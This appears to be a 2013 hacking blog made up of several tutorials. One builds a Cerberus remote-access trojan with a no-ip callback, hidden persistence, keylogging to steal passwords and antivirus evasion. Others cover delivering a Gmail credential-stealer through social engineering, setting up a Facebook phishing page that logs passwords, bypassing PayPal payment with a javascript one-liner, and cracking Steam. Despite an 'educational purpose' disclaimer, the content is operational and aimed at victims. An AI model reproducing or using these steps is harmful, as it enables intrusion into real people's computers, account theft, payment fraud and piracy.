Monday 17 June 2013

How to create a TROJAN and hack into anyone's computer.


This tutorial will teach you how to use a R.A.T. & How to get them started. Many people get confused on how to use them.


Requirements:
Download Cerberus 1.03.4 Beta.: 
Imagehttp://www.mediafire.com/?mtmzut0lygj


Step 1.)

Browse to the Cerberus folder, and run Cerberus.exe as shown.
Image

Step 2.)

The client window will be displayed. This is the main window which would be displaying a list of connections and their info, had you actually any victims online. Of course at the moment, it is empty. But when you do have victims, you would right-click on their name/icon to bring up a pop-up menu which would provide you with the option to do all sorts of fun stuff.
Zoom in (real dimensions: 974 x 453)

Step 3.)

Click on the Options button at the lower left corner of the window. This brings up Program Options. You can choose to leave the password as it is, or make a new one.
Image

You have the option to enter 3 ports to listen to. If you don't know how to port forward ports, go search for a tutorial on port forwarding. Once you have your desired ports properly forwarded, enter them (a maximum of 3) into these fields. As you can see, I left the first field default (5150) and then set the second to my preferred port (8245). No, this number doesn't have a whole lot of meaning. Just make sure it is forwarded. Now click Save, and click on Options again. If you just advance to the next radio button, your changes might not be saved.

Step 4.)


Skip down to the last radio button. (NOTE: If you have the No-IP DUC running, you can skip this step.)

In the username box, enter the email address you used to sign up at http://www.no-ip.com. If you don't have an IP registered there, go search for a tutorial on making a no-ip address then come back here once you have your account.
In the password box, enter the password you used at http://www.no-ip.com.



Zoom in (real dimensions: 978 x 452)Image


Click Update, Save, then Exit.

Step 5.)


Click the New button at the lower left, near the Options button.
This is where you start the creation of your server that you want your victims to click on.

Click the Basic Options button.
Zoom in (real dimensions: 973 x 442)Image

Where I have entered kaidzaccount.no-ip.biz, you would replace with your own no-ip address that you registered that http://www.no-ip.com.
Click the + button to add it to the Address Book. This is the address your server will try to connect to (destination: YOU). The password must be the same used in Step (E). Connection port must be a properly forwarded port, and one of the possible 3 ports that your Cerberus client will be listening to.

Step 7.)

Click the Server Installation radio button.
Set your options as I have. They don't need to be exact, except for the fact that Install Server must be checked.

The directory installation isn't very important, nor are the exact names you choose, but I would suggest you choose any directory besides Temporary Directory.
Image


Step 8.)

Select the Boot Methods radio button. This is where you will configure how your server is started whenever their PC is restarted.
Set your options as mine (you can change 'WindowsUpdate' to what ever you want) and click the + button after Active Setup a few times.
Zoom in (real dimensions: 978 x 452)Image

Step 9.)

This is where you bind a file of your choice to be run whenever your server is clicked on. If you aren't interested in binding a file to your server, skip this step.
Zoom in (real dimensions: 978 x 452)Image


Click the ... button after file to select a file to be bound inside your server.

In most circumstances, if the file is something the user actually wants, you would set Execution to Shell Execute (Normal). However, if you don't want any signs of this second added file being visible to the victim, set it to Shell Execute (Hidden). Setting the Destination to anything other than Temporary Directory is preferable. Make sure that a check-box is checked besides each file you want included in the server.
Zoom in (real dimensions: 978 x 452)Image


Here are some miscellaneous options. I would recommend checking Keylogger Active, so it is easier for you to steal passwords as your victim logs-in to websites.

Check Inject into Default Browser or select Process if you want your server to attempt to hide itself inside a running instance of the user-defined process ( I typed explorer, but if I wanted to inject into the Windows Explorer process I'm pretty sure that I should have typed Explorer.exe instead), and if it fails, it then injects itself into the victim's default browser. Among other things, this aids in preventing your server from being removed by an Anti-Virus program. Nothing is certain though, of course.

The Mutex is any value which uniquely identifies this certain build of your server. If another server with the same Mutex attempts to start, it will cancel because the same server will already be running. You can set the Mutex to whatever you like, or leave it alone.

Step 10.)

Under the Create Server page ( you can ignore Display Message, Blacklist, and Overview as they aren't really relevant to this tutorial ), pick a name for your server (which of course you can rename whenever), and select its icon. If the icon you want isn't in the Cerberus\Icons directory, then it won't be available for selection from the Icons List. To select a different icon, click on the icon image itself to load another. Of course, Use icon must be checked.
Zoom in (real dimensions: 978 x 452)Image


Compact Server with UPX indicates that you want your server to be compressed (in other words, reduced in file size) by the UPX freeware executable compressor. Optional.

Under the File Extension drop down menu, you must select either Application (*.exe) or Screen Saver (*.scr) if you want your selected icon to be displayed.

When you are done, click Create Server.

The following window will pop-up:
Zoom in (real dimensions: 978 x 452)Image


A description of what this means is beyond the scope of this tutorial (actually, I'm just too lazy to explain it) so you can go ahead and click No.

Another dialog will inform you that your server was created, and where it is located (usually in the Cerberus folder). You now have your server!
Zoom in (real dimensions: 978 x 452)Image

Now, it is time to test it. One way of doing this is to run it on a spare computer that has access to the internet; in my case, I just run the server myself, and if all goes as expected, my Cerberus will play this beast growling sound, and show a little balloon over it's taskbar icon, indicating that you have obtained a connection to a new victim!

That's it.

Sunday 16 June 2013

Everything - Find your file in 2 seconds!


Want something better than that silly sluggish windows search tool which takes hours to find your files/folders?
Download 'Everything' by Void Tools - Which will find your file within 3 seconds!
Please donate if possible.























Friday 11 January 2013

Get any PC game on Steam for FREE!

This tutorial will show you how to crack steam to get any PC game for FREE!.

Requirements:

  • Steam with a valid account.


How-to:

  • Download Green Luma rar file and extract it into your steam directory.
  • Now launch Green Luma.exe and go to your library for a surprise!
  • You'll be able to download many games for free, but not all
  • Many of them will show an error (no licenses.)
  • That's because you don't have the GCF / NCF files required to download that game.
  • To download the GCF / NCF files of any game, Go HERE.
  • Search for your game on that website and download the required files and copy it in your steamapps directory.
  • And try to download the game again via Steam.


Resources:

Enjoy!

Friday 4 January 2013

Gmail Hacking.

How to Hack Gmail Account Password using Gmail Hacker Software

hacking gmail account password, how to hack gmail account password This is the Simplest way of hacking gmail password, However this may not work for some people because most Antivirus software's easily recognizes this 'Gmail Hacker software'. This trick involves creating a special .exe file and sending it to the Victim. and when he or she runs this 'Gmail hacker software' you will get the Username and Password to your "Gmail Inbox". This Trick requires you to have "Microsoft's .net Framework", if you dont have please download and install it.
Hacking Gmail Account Password using 'Gmail Hacker' Software
Follow the Step by Step Tutorials below to hack Gmail Account Password
Step 1: Download "Gmail hacker" Software (extract the file to desktop). If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Hacking Gmail Account Password using Gmail Hacker Software Step 2: Run 'Gmail hacker Bulder.exe' file and enter your gmail account details, so that the password of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one fake account and enter those details.
Hacking Gmail Account Password using Gmail Hacker Software Step 3: After you enter your 'Gmail account' details Click on 'Build'. Now the Gmail Hacker will Clone itself, ie it will create another file called 'Gmail Hacker.exe' and will save it in the same folder.
Hacking Gmail Account Password using Gmail Hacker Software Step 4: Now Send the 'Gmail Hacker.exe' file that you just created to your Victim Via email or Upload it to any File sharing website for eg: box.net, Rapidshare, etc and send the link via chat or email. Ask the Victim to try that software to hack others email and some how convince him to run that software and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he want to hack). When he enters the required information and hits the 'hack them' Button, he will receive an error message as shown below and The Username and Password will be mailed to your Gmail Id (that you Specified in Step 2)


Note: you Should Provide a valid USERNAME and PASSWORD, in order to receive the hacked details.

Thursday 3 January 2013

Skip PayPal Payments! [works only on some websites]

Here is an easy way to skip those annoying PayPal payments before getting premium content.

Note: This tutorial shows how to skip paypal payments on some websites. It works only on downloadable content [e-boooks, softwares etc] blocked by Paypal payment and not on shippable products [DVDs etc.].

Note: Use only Google Chrome for this.It doesn't work on Firefox.


How-to:

  • Go to any website which has some premium content blocked by paypal payment. We'll go with http://www.snouthouse.com in this tutorial. [It has some kind of kit for training pet dogs which can be bought through paypal for $ 20].
  • Click on order now.
  • Now comes the annoying pay pal page.
  • Here's the trick:
  • Enter this code in the address bar : javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);
  • And alas! 

Download TORRENTs without a client.[BitTorrent,UTorrent etc.]

This tutorial is to teach you how to convert torrent download to direct http download. Its so simple. Just follow the steps carefully.
Steps:
  • Find a torrent file from any torrent files website.[eg. The Piratebay]
  • Download the .torrent file or just copy the magnet link souce.
  • Visit http://www.zbigz.com/.
  • Upload your downloaded .torrent file or paste the copied magnet link in zbigz.com
  • Hit enter or press Go.
  • Select/click Free.
  • Wait for some time, a message will appear "caching completed" and download button will be visible.
  • Click on Download. Select/click free again.
  • Now, download your file. If your file is compressed (zip, rar, etc), then you will get download immediately. But if not, then zbigz will first compress it and then it will give you download.

NOTE: Downloading torrent this way will give you slow download speed and you may not able to resume your downloads. Its better to use a free torrent client for downloading a torrent. 

Wednesday 2 January 2013

Facebook Phishing [Hacking]


This tutorial is for educational purpose only.
If you like this then please
  • Share this with your friends, family and known persons.


Facebook hacking i.e. Hack a facebook account is illegal, I am teaching you this to prevent you from these scams. You will be responsible if you hack any account. If your account has been hacked, then please follow this link, http://www.facebook.com/hacked, answer a few simple question and get your account back.



Hacking Facebook.

There are several ways of hacking facebook. Some are phishing, remote keylogger, keylogger, cookie stealing, click hijacking, etc. 


Phishing.

Warning & Disclaimer:

Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I will not bw responsible for it. Do anything on your own risk.

What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

 1) REQUIREMENTS: 

     1) A website:

     2) Phishing files:

  • Download the files (.rar file) required for phishing from HERE

2) How to HACK

First of all you need a website.
Register on one of the above given links to get a free website and hosting.
Once you get your free website, follow the steps given below:
  • Download the .rar file and extract it anywhere.
  • You shall find 3 files [index.htm , login.php , passes.txt].
  • Upload these 3 files to your website through the filemanager in the Cpanel.
  • File manager in the Cpanel
















  • If you open your website now, you will find the facebook login page.[It is not the original page.Its a ditto copy of it.] .
  •  You are done now.
  • Give your website URL [eg. www.yourname.site11.com] to the person whose account you want to hack.
  • If he/she enters their email id and password on your site, it will be written in the file 'passes.txt'.
  • Download the file 'passes.txt' from the file manager and open it.
  • You will find the victims email id and password with which he/she log-in to his/her account.
                                                                                                                  - Jay Parekh